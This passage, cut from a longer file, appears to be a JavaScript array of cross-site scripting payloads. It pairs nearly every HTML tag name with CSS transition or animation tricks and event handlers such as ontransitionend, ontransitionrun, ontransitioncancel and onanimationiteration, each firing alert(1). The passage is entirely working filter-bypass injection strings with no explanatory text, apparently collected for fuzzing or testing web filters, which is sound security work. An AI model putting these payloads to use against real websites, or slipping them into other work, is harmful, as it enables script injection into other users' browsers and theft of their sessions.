{color:red;}</style><details id=x style="transition:color 1s" ontransitionend=alert(1)></details>' +xss,'<style>:target {color:red;}</style><dfn id=x style="transition:color 1s" ontransitionend=alert(1)></dfn>' +xss,'<style>:target {color:red;}</style><dialog id=x style="transition:color 1s" ontransitionend=alert(1)></dialog>' +xss,'<style>:target {color:red;}</style><dir id=x style="transition:color 1s" ontransitionend=alert(1)></dir>' +xss,'<style>:target {color:red;}</style><div id=x style="transition:color 1s" ontransitionend=alert(1)></div>' +xss,'<style>:target {color:red;}</style><dl id=x style="transition:color 1s" ontransitionend=alert(1)></dl>' +xss,'<style>:target {color:red;}</style><dt id=x style="transition:color 1s" ontransitionend=alert(1)></dt>' +xss,'<style>:target {color:red;}</style><element id=x style="transition:color 1s" ontransitionend=alert(1)></element>' +xss,'<style>:target {color:red;}</style><em id=x style="transition:color 1s" ontransitionend=alert(1)></em>' +xss,'<style>:target {color:red;}</style><embed id=x style="transition:color 1s" ontransitionend=alert(1)></embed>' +xss,'<style>:target {color:red;}</style><fieldset id=x style="transition:color 1s" ontransitionend=alert(1)></fieldset>' +xss,'<style>:target {color:red;}</style><figcaption id=x style="transition:color 1s" ontransitionend=alert(1)></figcaption>' +xss,'<style>:target {color:red;}</style><figure id=x style="transition:color 1s" ontransitionend=alert(1)></figure>' +xss,'<style>:target {color:red;}</style><font id=x style="transition:color 1s" ontransitionend=alert(1)></font>' +xss,'<style>:target {color:red;}</style><footer id=x style="transition:color 1s" ontransitionend=alert(1)></footer>' +xss,'<style>:target {color:red;}</style><form id=x style="transition:color 1s" ontransitionend=alert(1)></form>' +xss,'<style>:target {color:red;}</style><frame id=x style="transition:color 1s" ontransitionend=alert(1)></frame>' +xss,'<style>:target {color:red;}</style><frameset id=x style="transition:color 1s" ontransitionend=alert(1)></frameset>' +xss,'<style>:target {color:red;}</style><h1 id=x style="transition:color 1s" ontransitionend=alert(1)></h1>' +xss,'<style>:target {color:red;}</style><head id=x style="transition:color 1s" ontransitionend=alert(1)></head>' +xss,'<style>:target {color:red;}</style><header id=x style="transition:color 1s" ontransitionend=alert(1)></header>' +xss,'<style>:target {color:red;}</style><hgroup id=x style="transition:color 1s" ontransitionend=alert(1)></hgroup>' +xss,'<style>:target {color:red;}</style><hr id=x style="transition:color 1s" ontransitionend=alert(1)></hr>' +xss,'<style>:target {color:red;}</style><html id=x style="transition:color 1s" ontransitionend=alert(1)></html>' +xss,'<style>:target {color:red;}</style><i id=x style="transition:color 1s" ontransitionend=alert(1)></i>' +xss,'<style>:target {color:red;}</style><iframe id=x style="transition:color 1s" ontransitionend=alert(1)></iframe>' +xss,'<style>:target {color:red;}</style><image id=x style="transition:color 1s" ontransitionend=alert(1)></image>' +xss,'<style>:target {color:red;}</style><img id=x style="transition:color 1s" ontransitionend=alert(1)></img>' +xss,'<style>:target {color:red;}</style><input id=x style="transition:color 1s" ontransitionend=alert(1)></input>' +xss,'<style>:target {color:red;}</style><ins id=x style="transition:color 1s" ontransitionend=alert(1)></ins>' +xss,'<style>:target {color:red;}</style><isindex id=x style="transition:color 1s" ontransitionend=alert(1)></isindex>' +xss,'<style>:target {color:red;}</style><kbd id=x style="transition:color 1s" ontransitionend=alert(1)></kbd>' +xss,'<style>:target {color:red;}</style><keygen id=x style="transition:color 1s" ontransitionend=alert(1)></keygen>' +xss,'<style>:target {color:red;}</style><label id=x style="transition:color 1s" ontransitionend=alert(1)></label>' +xss,'<style>:target {color:red;}</style><legend id=x style="transition:color 1s" ontransitionend=alert(1)></legend>' +xss,'<style>:target {color:red;}</style><li id=x style="transition:color 1s" ontransitionend=alert(1)></li>' +xss,'<style>:target {color:red;}</style><link id=x style="transition:color 1s" ontransitionend=alert(1)></link>' +xss,'<style>:target {color:red;}</style><listing id=x style="transition:color 1s" ontransitionend=alert(1)></listing>' +xss,'<style>:target {color:red;}</style><main id=x style="transition:color 1s" ontransitionend=alert(1)></main>' +xss,'<style>:target {color:red;}</style><map id=x style="transition:color 1s" ontransitionend=alert(1)></map>' +xss,'<style>:target {color:red;}</style><mark id=x style="transition:color 1s" ontransitionend=alert(1)></mark>' +xss,'<style>:target {color:red;}</style><marquee id=x style="transition:color 1s" ontransitionend=alert(1)></marquee>' +xss,'<style>:target {color:red;}</style><menu id=x style="transition:color 1s" ontransitionend=alert(1)></menu>' +xss,'<style>:target {color:red;}</style><menuitem id=x style="transition:color 1s" ontransitionend=alert(1)></menuitem>' +xss,'<style>:target {color:red;}</style><meta id=x style="transition:color 1s" ontransitionend=alert(1)></meta>' +xss,'<style>:target {color:red;}</style><meter id=x style="transition:color 1s" ontransitionend=alert(1)></meter>' +xss,'<style>:target {color:red;}</style><multicol id=x style="transition:color 1s" ontransitionend=alert(1)></multicol>' +xss,'<style>:target {color:red;}</style><nav id=x style="transition:color 1s" ontransitionend=alert(1)></nav>' +xss,'<style>:target {color:red;}</style><nextid id=x style="transition:color 1s" ontransitionend=alert(1)></nextid>' +xss,'<style>:target {color:red;}</style><nobr id=x style="transition:color 1s" ontransitionend=alert(1)></nobr>' +xss,'<style>:target {color:red;}</style><noembed id=x style="transition:color 1s" ontransitionend=alert(1)></noembed>' +xss,'<style>:target {color:red;}</style><noframes id=x style="transition:color 1s" ontransitionend=alert(1)></noframes>' +xss,'<style>:target {color:red;}</style><noscript id=x style="transition:color 1s" ontransitionend=alert(1)></noscript>' +xss,'<style>:target {color:red;}</style><object id=x style="transition:color 1s" ontransitionend=alert(1)></object>' +xss,'<style>:target {color:red;}</style><ol id=x style="transition:color 1s" ontransitionend=alert(1)></ol>' +xss,'<style>:target {color:red;}</style><optgroup id=x style="transition:color 1s" ontransitionend=alert(1)></optgroup>' +xss,'<style>:target {color:red;}</style><option id=x style="transition:color 1s" ontransitionend=alert(1)></option>' +xss,'<style>:target {color:red;}</style><output id=x style="transition:color 1s" ontransitionend=alert(1)></output>' +xss,'<style>:target {color:red;}</style><p id=x style="transition:color 1s" ontransitionend=alert(1)></p>' +xss,'<style>:target {color:red;}</style><param id=x style="transition:color 1s" ontransitionend=alert(1)></param>' +xss,'<style>:target {color:red;}</style><picture id=x style="transition:color 1s" ontransitionend=alert(1)></picture>' +xss,'<style>:target {color:red;}</style><plaintext id=x style="transition:color 1s" ontransitionend=alert(1)></plaintext>' +xss,'<style>:target {color:red;}</style><pre id=x style="transition:color 1s" ontransitionend=alert(1)></pre>' +xss,'<style>:target {color:red;}</style><progress id=x style="transition:color 1s" ontransitionend=alert(1)></progress>' +xss,'<style>:target {color:red;}</style><q id=x style="transition:color 1s" ontransitionend=alert(1)></q>' +xss,'<style>:target {color:red;}</style><rb id=x style="transition:color 1s" ontransitionend=alert(1)></rb>' +xss,'<style>:target {color:red;}</style><rp id=x style="transition:color 1s" ontransitionend=alert(1)></rp>' +xss,'<style>:target {color:red;}</style><rt id=x style="transition:color 1s" ontransitionend=alert(1)></rt>' +xss,'<style>:target {color:red;}</style><rtc id=x style="transition:color 1s" ontransitionend=alert(1)></rtc>' +xss,'<style>:target {color:red;}</style><ruby id=x style="transition:color 1s" ontransitionend=alert(1)></ruby>' +xss,'<style>:target {color:red;}</style><s id=x style="transition:color 1s" ontransitionend=alert(1)></s>' +xss,'<style>:target {color:red;}</style><samp id=x style="transition:color 1s" ontransitionend=alert(1)></samp>' +xss,'<style>:target {color:red;}</style><script id=x style="transition:color 1s" ontransitionend=alert(1)></script>' +xss,'<style>:target {color:red;}</style><section id=x style="transition:color 1s" ontransitionend=alert(1)></section>' +xss,'<style>:target {color:red;}</style><select id=x style="transition:color 1s" ontransitionend=alert(1)></select>' +xss,'<style>:target {color:red;}</style><shadow id=x style="transition:color 1s" ontransitionend=alert(1)></shadow>' +xss,'<style>:target {color:red;}</style><slot id=x style="transition:color 1s" ontransitionend=alert(1)></slot>' +xss,'<style>:target {color:red;}</style><small id=x style="transition:color 1s" ontransitionend=alert(1)></small>' +xss,'<style>:target {color:red;}</style><source id=x style="transition:color 1s" ontransitionend=alert(1)></source>' +xss,'<style>:target {color:red;}</style><spacer id=x style="transition:color 1s" ontransitionend=alert(1)></spacer>' +xss,'<style>:target {color:red;}</style><span id=x style="transition:color 1s" ontransitionend=alert(1)></span>' +xss,'<style>:target {color:red;}</style><strike id=x style="transition:color 1s" ontransitionend=alert(1)></strike>' +xss,'<style>:target {color:red;}</style><strong id=x style="transition:color 1s" ontransitionend=alert(1)></strong>' +xss,'<style>:target {color:red;}</style><style id=x style="transition:color 1s" ontransitionend=alert(1)></style>' +xss,'<style>:target {color:red;}</style><sub id=x style="transition:color 1s" ontransitionend=alert(1)></sub>' +xss,'<style>:target {color:red;}</style><summary id=x style="transition:color 1s" ontransitionend=alert(1)></summary>' +xss,'<style>:target {color:red;}</style><sup id=x style="transition:color 1s" ontransitionend=alert(1)></sup>' +xss,'<style>:target {color:red;}</style><svg id=x style="transition:color 1s" ontransitionend=alert(1)></svg>' +xss,'<style>:target {color:red;}</style><table id=x style="transition:color 1s" ontransitionend=alert(1)></table>' +xss,'<style>:target {color:red;}</style><tbody id=x style="transition:color 1s" ontransitionend=alert(1)></tbody>' +xss,'<style>:target {color:red;}</style><td id=x style="transition:color 1s" ontransitionend=alert(1)></td>' +xss,'<style>:target {color:red;}</style><template id=x style="transition:color 1s" ontransitionend=alert(1)></template>' +xss,'<style>:target {color:red;}</style><textarea id=x style="transition:color 1s" ontransitionend=alert(1)></textarea>' +xss,'<style>:target {color:red;}</style><tfoot id=x style="transition:color 1s" ontransitionend=alert(1)></tfoot>' +xss,'<style>:target {color:red;}</style><th id=x style="transition:color 1s" ontransitionend=alert(1)></th>' +xss,'<style>:target {color:red;}</style><thead id=x style="transition:color 1s" ontransitionend=alert(1)></thead>' +xss,'<style>:target {color:red;}</style><time id=x style="transition:color 1s" ontransitionend=alert(1)></time>' +xss,'<style>:target {color:red;}</style><title id=x style="transition:color 1s" ontransitionend=alert(1)></title>' +xss,'<style>:target {color:red;}</style><tr id=x style="transition:color 1s" ontransitionend=alert(1)></tr>' +xss,'<style>:target {color:red;}</style><track id=x style="transition:color 1s" ontransitionend=alert(1)></track>' +xss,'<style>:target {color:red;}</style><tt id=x style="transition:color 1s" ontransitionend=alert(1)></tt>' +xss,'<style>:target {color:red;}</style><u id=x style="transition:color 1s" ontransitionend=alert(1)></u>' +xss,'<style>:target {color:red;}</style><ul id=x style="transition:color 1s" ontransitionend=alert(1)></ul>' +xss,'<style>:target {color:red;}</style><var id=x style="transition:color 1s" ontransitionend=alert(1)></var>' +xss,'<style>:target {color:red;}</style><video id=x style="transition:color 1s" ontransitionend=alert(1)></video>' +xss,'<style>:target {color:red;}</style><wbr id=x style="transition:color 1s" ontransitionend=alert(1)></wbr>' +xss,'<style>:target {color:red;}</style><xmp id=x style="transition:color 1s" ontransitionend=alert(1)></xmp>' +xss,'<style>:target {transform: rotate(180deg);}</style><a id=x style="transition:transform 2s" ontransitionrun=alert(1)></a>' +xss,'<style>:target {transform: rotate(180deg);}</style><abbr id=x style="transition:transform 2s" ontransitionrun=alert(1)></abbr>' +xss,'<style>:target {transform: rotate(180deg);}</style><acronym id=x style="transition:transform 2s" ontransitionrun=alert(1)></acronym>' +xss,'<style>:target {transform: rotate(180deg);}</style><address id=x style="transition:transform 2s" ontransitionrun=alert(1)></address>' +xss,'<style>:target {transform: rotate(180deg);}</style><applet id=x style="transition:transform 2s" ontransitionrun=alert(1)></applet>' +xss,'<style>:target {transform: rotate(180deg);}</style><area id=x style="transition:transform 2s" ontransitionrun=alert(1)></area>' +xss,'<style>:target {transform: rotate(180deg);}</style><article id=x style="transition:transform 2s" ontransitionrun=alert(1)></article>' +xss,'<style>:target {transform: rotate(180deg);}</style><aside id=x style="transition:transform 2s" ontransitionrun=alert(1)></aside>' +xss,'<style>:target {transform: rotate(180deg);}</style><audio id=x style="transition:transform 2s" ontransitionrun=alert(1)></audio>' +xss,'<style>:target {transform: rotate(180deg);}</style><b id=x style="transition:transform 2s" ontransitionrun=alert(1)></b>' +xss,'<style>:target {transform: rotate(180deg);}</style><base id=x style="transition:transform 2s" ontransitionrun=alert(1)></base>' +xss,'<style>:target {transform: rotate(180deg);}</style><basefont id=x style="transition:transform 2s" ontransitionrun=alert(1)></basefont>' +xss,'<style>:target {transform: rotate(180deg);}</style><bdi id=x style="transition:transform 2s" ontransitionrun=alert(1)></bdi>' +xss,'<style>:target {transform: rotate(180deg);}</style><bdo id=x style="transition:transform 2s" ontransitionrun=alert(1)></bdo>' +xss,'<style>:target {transform: rotate(180deg);}</style><bgsound id=x style="transition:transform 2s" ontransitionrun=alert(1)></bgsound>' +xss,'<style>:target {transform: rotate(180deg);}</style><big id=x style="transition:transform 2s" ontransitionrun=alert(1)></big>' +xss,'<style>:target {transform: rotate(180deg);}</style><blink id=x style="transition:transform 2s" ontransitionrun=alert(1)></blink>' +xss,'<style>:target {transform: rotate(180deg);}</style><blockquote id=x style="transition:transform 2s" ontransitionrun=alert(1)></blockquote>' +xss,'<style>:target {transform: rotate(180deg);}</style><body id=x style="transition:transform 2s" ontransitionrun=alert(1)></body>' +xss,'<style>:target {transform: rotate(180deg);}</style><br id=x style="transition:transform 2s" ontransitionrun=alert(1)></br>' +xss,'<style>:target {transform: rotate(180deg);}</style><button id=x style="transition:transform 2s" ontransitionrun=alert(1)></button>' +xss,'<style>:target {transform: rotate(180deg);}</style><canvas id=x style="transition:transform 2s" ontransitionrun=alert(1)></canvas>' +xss,'<style>:target {transform: rotate(180deg);}</style><caption id=x style="transition:transform 2s" ontransitionrun=alert(1)></caption>' +xss,'<style>:target {transform: rotate(180deg);}</style><center id=x style="transition:transform 2s" ontransitionrun=alert(1)></center>' +xss,'<style>:target {transform: rotate(180deg);}</style><cite id=x style="transition:transform 2s" ontransitionrun=alert(1)></cite>' +xss,'<style>:target {transform: rotate(180deg);}</style><code id=x style="transition:transform 2s" ontransitionrun=alert(1)></code>' +xss,'<style>:target {transform: rotate(180deg);}</style><col id=x style="transition:transform 2s" ontransitionrun=alert(1)></col>' +xss,'<style>:target {transform: rotate(180deg);}</style><colgroup id=x style="transition:transform 2s" ontransitionrun=alert(1)></colgroup>' +xss,'<style>:target {transform: rotate(180deg);}</style><command id=x style="transition:transform 2s" ontransitionrun=alert(1)></command>' +xss,'<style>:target {transform: rotate(180deg);}</style><content id=x style="transition:transform 2s" ontransitionrun=alert(1)></content>' +xss,'<style>:target {transform: rotate(180deg);}</style><data id=x style="transition:transform 2s" ontransitionrun=alert(1)></data>' +xss,'<style>:target {transform: rotate(180deg);}</style><datalist id=x style="transition:transform 2s" ontransitionrun=alert(1)></datalist>' +xss,'<style>:target {transform: rotate(180deg);}</style><dd id=x style="transition:transform 2s" ontransitionrun=alert(1)></dd>' +xss,'<style>:target {transform: rotate(180deg);}</style><del id=x style="transition:transform 2s" ontransitionrun=alert(1)></del>' +xss,'<style>:target {transform: rotate(180deg);}</style><details id=x style="transition:transform 2s" ontransitionrun=alert(1)></details>' +xss,'<style>:target {transform: rotate(180deg);}</style><dfn id=x style="transition:transform 2s" ontransitionrun=alert(1)></dfn>' +xss,'<style>:target {transform: rotate(180deg);}</style><dialog id=x style="transition:transform 2s" ontransitionrun=alert(1)></dialog>' +xss,'<style>:target {transform: rotate(180deg);}</style><dir id=x style="transition:transform 2s" ontransitionrun=alert(1)></dir>' +xss,'<style>:target {transform: rotate(180deg);}</style><div id=x style="transition:transform 2s" ontransitionrun=alert(1)></div>' +xss,'<style>:target {transform: rotate(180deg);}</style><dl id=x style="transition:transform 2s" ontransitionrun=alert(1)></dl>' +xss,'<style>:target {transform: rotate(180deg);}</style><dt id=x style="transition:transform 2s" ontransitionrun=alert(1)></dt>' +xss,'<style>:target {transform: rotate(180deg);}</style><element id=x style="transition:transform 2s" ontransitionrun=alert(1)></element>' +xss,'<style>:target {transform: rotate(180deg);}</style><em id=x style="transition:transform 2s" ontransitionrun=alert(1)></em>' +xss,'<style>:target {transform: rotate(180deg);}</style><embed id=x style="transition:transform 2s" ontransitionrun=alert(1)></embed>' +xss,'<style>:target {transform: rotate(180deg);}</style><fieldset id=x style="transition:transform 2s" ontransitionrun=alert(1)></fieldset>' +xss,'<style>:target {transform: rotate(180deg);}</style><figcaption id=x style="transition:transform 2s" ontransitionrun=alert(1)></figcaption>' +xss,'<style>:target {transform: rotate(180deg);}</style><figure id=x style="transition:transform 2s" ontransitionrun=alert(1)></figure>' +xss,'<style>:target {transform: rotate(180deg);}</style><font id=x style="transition:transform 2s" ontransitionrun=alert(1)></font>' +xss,'<style>:target {transform: rotate(180deg);}</style><footer id=x style="transition:transform 2s" ontransitionrun=alert(1)></footer>' +xss,'<style>:target {transform: rotate(180deg);}</style><form id=x style="transition:transform 2s" ontransitionrun=alert(1)></form>' +xss,'<style>:target {transform: rotate(180deg);}</style><frame id=x style="transition:transform 2s" ontransitionrun=alert(1)></frame>' +xss,'<style>:target {transform: rotate(180deg);}</style><frameset id=x style="transition:transform 2s" ontransitionrun=alert(1)></frameset>' +xss,'<style>:target {transform: rotate(180deg);}</style><h1 id=x style="transition:transform 2s" ontransitionrun=alert(1)></h1>' +xss,'<style>:target {transform: rotate(180deg);}</style><head id=x style="transition:transform 2s" ontransitionrun=alert(1)></head>' +xss,'<style>:target {transform: rotate(180deg);}</style><header id=x style="transition:transform 2s" ontransitionrun=alert(1)></header>' +xss,'<style>:target {transform: rotate(180deg);}</style><hgroup id=x style="transition:transform 2s" ontransitionrun=alert(1)></hgroup>' +xss,'<style>:target {transform: rotate(180deg);}</style><hr id=x style="transition:transform 2s" ontransitionrun=alert(1)></hr>' +xss,'<style>:target {transform: rotate(180deg);}</style><html id=x style="transition:transform 2s" ontransitionrun=alert(1)></html>' +xss,'<style>:target {transform: rotate(180deg);}</style><i id=x style="transition:transform 2s" ontransitionrun=alert(1)></i>' +xss,'<style>:target {transform: rotate(180deg);}</style><iframe id=x style="transition:transform 2s" ontransitionrun=alert(1)></iframe>' +xss,'<style>:target {transform: rotate(180deg);}</style><image id=x style="transition:transform 2s" ontransitionrun=alert(1)></image>' +xss,'<style>:target {transform: rotate(180deg);}</style><img id=x style="transition:transform 2s" ontransitionrun=alert(1)></img>' +xss,'<style>:target {transform: rotate(180deg);}</style><input id=x style="transition:transform 2s" ontransitionrun=alert(1)></input>' +xss,'<style>:target {transform: rotate(180deg);}</style><ins id=x style="transition:transform 2s" ontransitionrun=alert(1)></ins>' +xss,'<style>:target {transform: rotate(180deg);}</style><isindex id=x style="transition:transform 2s" ontransitionrun=alert(1)></isindex>' +xss,'<style>:target {transform: rotate(180deg);}</style><kbd id=x style="transition:transform 2s" ontransitionrun=alert(1)></kbd>' +xss,'<style>:target {transform: rotate(180deg);}</style><keygen id=x style="transition:transform 2s" ontransitionrun=alert(1)></keygen>' +xss,'<style>:target {transform: rotate(180deg);}</style><label id=x style="transition:transform 2s" ontransitionrun=alert(1)></label>' +xss,'<style>:target {transform: rotate(180deg);}</style><legend id=x style="transition:transform 2s" ontransitionrun=alert(1)></legend>' +xss,'<style>:target {transform: rotate(180deg);}</style><li id=x style="transition:transform 2s" ontransitionrun=alert(1)></li>' +xss,'<style>:target {transform: rotate(180deg);}</style><link id=x style="transition:transform 2s" ontransitionrun=alert(1)></link>' +xss,'<style>:target {transform: rotate(180deg);}</style><listing id=x style="transition:transform 2s" ontransitionrun=alert(1)></listing>' +xss,'<style>:target {transform: rotate(180deg);}</style><main id=x style="transition:transform 2s" ontransitionrun=alert(1)></main>' +xss,'<style>:target {transform: rotate(180deg);}</style><map id=x style="transition:transform 2s" ontransitionrun=alert(1)></map>' +xss,'<style>:target {transform: rotate(180deg);}</style><mark id=x style="transition:transform 2s" ontransitionrun=alert(1)></mark>' +xss,'<style>:target {transform: rotate(180deg);}</style><marquee id=x style="transition:transform 2s" ontransitionrun=alert(1)></marquee>' +xss,'<style>:target {transform: rotate(180deg);}</style><menu id=x style="transition:transform 2s" ontransitionrun=alert(1)></menu>' +xss,'<style>:target {transform: rotate(180deg);}</style><menuitem id=x style="transition:transform 2s" ontransitionrun=alert(1)></menuitem>' +xss,'<style>:target {transform: rotate(180deg);}</style><meta id=x style="transition:transform 2s" ontransitionrun=alert(1)></meta>' +xss,'<style>:target {transform: rotate(180deg);}</style><meter id=x style="transition:transform 2s" ontransitionrun=alert(1)></meter>' +xss,'<style>:target {transform: rotate(180deg);}</style><multicol id=x style="transition:transform 2s" ontransitionrun=alert(1)></multicol>' +xss,'<style>:target {transform: rotate(180deg);}</style><nav id=x style="transition:transform 2s" ontransitionrun=alert(1)></nav>' +xss,'<style>:target {transform: rotate(180deg);}</style><nextid id=x style="transition:transform 2s" ontransitionrun=alert(1)></nextid>' +xss,'<style>:target {transform: rotate(180deg);}</style><nobr id=x style="transition:transform 2s" ontransitionrun=alert(1)></nobr>' +xss,'<style>:target {transform: rotate(180deg);}</style><noembed id=x style="transition:transform 2s" ontransitionrun=alert(1)></noembed>' +xss,'<style>:target {transform: rotate(180deg);}</style><noframes id=x style="transition:transform 2s" ontransitionrun=alert(1)></noframes>' +xss,'<style>:target {transform: rotate(180deg);}</style><noscript id=x style="transition:transform 2s" ontransitionrun=alert(1)></noscript>' +xss,'<style>:target {transform: rotate(180deg);}</style><object id=x style="transition:transform 2s" ontransitionrun=alert(1)></object>' +xss,'<style>:target {transform: rotate(180deg);}</style><ol id=x style="transition:transform 2s" ontransitionrun=alert(1)></ol>' +xss,'<style>:target {transform: rotate(180deg);}</style><optgroup id=x style="transition:transform 2s" ontransitionrun=alert(1)></optgroup>' +xss,'<style>:target {transform: rotate(180deg);}</style><option id=x style="transition:transform 2s" ontransitionrun=alert(1)></option>' +xss,'<style>:target {transform: rotate(180deg);}</style><output id=x style="transition:transform 2s" ontransitionrun=alert(1)></output>' +xss,'<style>:target {transform: rotate(180deg);}</style><p id=x style="transition:transform 2s" ontransitionrun=alert(1)></p>' +xss,'<style>:target {transform: rotate(180deg);}</style><param id=x style="transition:transform 2s" ontransitionrun=alert(1)></param>' +xss,'<style>:target {transform: rotate(180deg);}</style><picture id=x style="transition:transform 2s" ontransitionrun=alert(1)></picture>' +xss,'<style>:target {transform: rotate(180deg);}</style><plaintext id=x style="transition:transform 2s" ontransitionrun=alert(1)></plaintext>' +xss,'<style>:target {transform: rotate(180deg);}</style><pre id=x style="transition:transform 2s" ontransitionrun=alert(1)></pre>' +xss,'<style>:target {transform: rotate(180deg);}</style><progress id=x style="transition:transform 2s" ontransitionrun=alert(1)></progress>' +xss,'<style>:target {transform: rotate(180deg);}</style><q id=x style="transition:transform 2s" ontransitionrun=alert(1)></q>' +xss,'<style>:target {transform: rotate(180deg);}</style><rb id=x style="transition:transform 2s" ontransitionrun=alert(1)></rb>' +xss,'<style>:target {transform: rotate(180deg);}</style><rp id=x style="transition:transform 2s" ontransitionrun=alert(1)></rp>' +xss,'<style>:target {transform: rotate(180deg);}</style><rt id=x style="transition:transform 2s" ontransitionrun=alert(1)></rt>' +xss,'<style>:target {transform: rotate(180deg);}</style><rtc id=x style="transition:transform 2s" ontransitionrun=alert(1)></rtc>' +xss,'<style>:target {transform: rotate(180deg);}</style><ruby id=x style="transition:transform 2s" ontransitionrun=alert(1)></ruby>' +xss,'<style>:target {transform: rotate(180deg);}</style><s id=x style="transition:transform 2s" ontransitionrun=alert(1)></s>' +xss,'<style>:target {transform: rotate(180deg);}</style><samp id=x style="transition:transform 2s" ontransitionrun=alert(1)></samp>' +xss,'<style>:target {transform: rotate(180deg);}</style><script id=x style="transition:transform 2s" ontransitionrun=alert(1)></script>' +xss,'<style>:target {transform: rotate(180deg);}</style><section id=x style="transition:transform 2s" ontransitionrun=alert(1)></section>' +xss,'<style>:target {transform: rotate(180deg);}</style><select id=x style="transition:transform 2s" ontransitionrun=alert(1)></select>' +xss,'<style>:target {transform: rotate(180deg);}</style><shadow id=x style="transition:transform 2s" ontransitionrun=alert(1)></shadow>' +xss,'<style>:target {transform: rotate(180deg);}</style><slot id=x style="transition:transform 2s" ontransitionrun=alert(1)></slot>' +xss,'<style>:target {transform: rotate(180deg);}</style><small id=x style="transition:transform 2s" ontransitionrun=alert(1)></small>' +xss,'<style>:target {transform: rotate(180deg);}</style><source id=x style="transition:transform 2s" ontransitionrun=alert(1)></source>' +xss,'<style>:target {transform: rotate(180deg);}</style><spacer id=x style="transition:transform 2s" ontransitionrun=alert(1)></spacer>' +xss,'<style>:target {transform: rotate(180deg);}</style><span id=x style="transition:transform 2s" ontransitionrun=alert(1)></span>' +xss,'<style>:target {transform: rotate(180deg);}</style><strike id=x style="transition:transform 2s" ontransitionrun=alert(1)></strike>' +xss,'<style>:target {transform: rotate(180deg);}</style><strong id=x style="transition:transform 2s" ontransitionrun=alert(1)></strong>' +xss,'<style>:target {transform: rotate(180deg);}</style><style id=x style="transition:transform 2s" ontransitionrun=alert(1)></style>' +xss,'<style>:target {transform: rotate(180deg);}</style><sub id=x style="transition:transform 2s" ontransitionrun=alert(1)></sub>' +xss,'<style>:target {transform: rotate(180deg);}</style><summary id=x style="transition:transform 2s" ontransitionrun=alert(1)></summary>' +xss,'<style>:target {transform: rotate(180deg);}</style><sup id=x style="transition:transform 2s" ontransitionrun=alert(1)></sup>' +xss,'<style>:target {transform: rotate(180deg);}</style><svg id=x style="transition:transform 2s" ontransitionrun=alert(1)></svg>' +xss,'<style>:target {transform: rotate(180deg);}</style><table id=x style="transition:transform 2s" ontransitionrun=alert(1)></table>' +xss,'<style>:target {transform: rotate(180deg);}</style><tbody id=x style="transition:transform 2s" ontransitionrun=alert(1)></tbody>' +xss,'<style>:target {transform: rotate(180deg);}</style><td id=x style="transition:transform 2s" ontransitionrun=alert(1)></td>' +xss,'<style>:target {transform: rotate(180deg);}</style><template id=x style="transition:transform 2s" ontransitionrun=alert(1)></template>' +xss,'<style>:target {transform: rotate(180deg);}</style><textarea id=x style="transition:transform 2s" ontransitionrun=alert(1)></textarea>' +xss,'<style>:target {transform: rotate(180deg);}</style><tfoot id=x style="transition:transform 2s" ontransitionrun=alert(1)></tfoot>' +xss,'<style>:target {transform: rotate(180deg);}</style><th id=x style="transition:transform 2s" ontransitionrun=alert(1)></th>' +xss,'<style>:target {transform: rotate(180deg);}</style><thead id=x style="transition:transform 2s" ontransitionrun=alert(1)></thead>' +xss,'<style>:target {transform: rotate(180deg);}</style><time id=x style="transition:transform 2s" ontransitionrun=alert(1)></time>' +xss,'<style>:target {transform: rotate(180deg);}</style><title id=x style="transition:transform 2s" ontransitionrun=alert(1)></title>' +xss,'<style>:target {transform: rotate(180deg);}</style><tr id=x style="transition:transform 2s" ontransitionrun=alert(1)></tr>' +xss,'<style>:target {transform: rotate(180deg);}</style><track id=x style="transition:transform 2s" ontransitionrun=alert(1)></track>' +xss,'<style>:target {transform: rotate(180deg);}</style><tt id=x style="transition:transform 2s" ontransitionrun=alert(1)></tt>' +xss,'<style>:target {transform: rotate(180deg);}</style><u id=x style="transition:transform 2s" ontransitionrun=alert(1)></u>' +xss,'<style>:target {transform: rotate(180deg);}</style><ul id=x style="transition:transform 2s" ontransitionrun=alert(1)></ul>' +xss,'<style>:target {transform: rotate(180deg);}</style><var id=x style="transition:transform 2s" ontransitionrun=alert(1)></var>' +xss,'<style>:target {transform: rotate(180deg);}</style><video id=x style="transition:transform 2s" ontransitionrun=alert(1)></video>' +xss,'<style>:target {transform: rotate(180deg);}</style><wbr id=x style="transition:transform 2s" ontransitionrun=alert(1)></wbr>' +xss,'<style>:target {transform: rotate(180deg);}</style><xmp id=x style="transition:transform 2s" ontransitionrun=alert(1)></xmp>' +xss,'<style>:target {transform: rotate(180deg);}</style><xss id=x style="transition:transform 10s" ontransitioncancel=alert(1)></xss>' +xss,'<style>:target {transform: rotate(180deg);}</style><xss id=x style="transition:transform 2s" ontransitionrun=alert(1)></xss>' +xss,'<style>@keyframes slidein {}</style><a style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></a>' +xss,'<style>@keyframes slidein {}</style><abbr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></abbr>' +xss,'<style>@keyframes slidein {}</style><acronym style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></acronym>' +xss,'<style>@keyframes slidein {}</style><address style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></address>' +xss,'<style>@keyframes slidein {}</style><applet style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></applet>' +xss,'<style>@keyframes slidein {}</style><area style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></area>' +xss,'<style>@keyframes slidein {}</style><article style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></article>' +xss,'<style>@keyframes slidein {}</style><aside style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></aside>' +xss,'<style>@keyframes slidein {}</style><audio style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></audio>' +xss,'<style>@keyframes slidein {}</style><b style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></b>' +xss,'<style>@keyframes slidein {}</style><base style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></base>' +xss,'<style>@keyframes slidein {}</style><basefont style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></basefont>' +xss,'<style>@keyframes slidein {}</style><bdi style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></bdi>' +xss,'<style>@keyframes slidein {}</style><bdo style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" 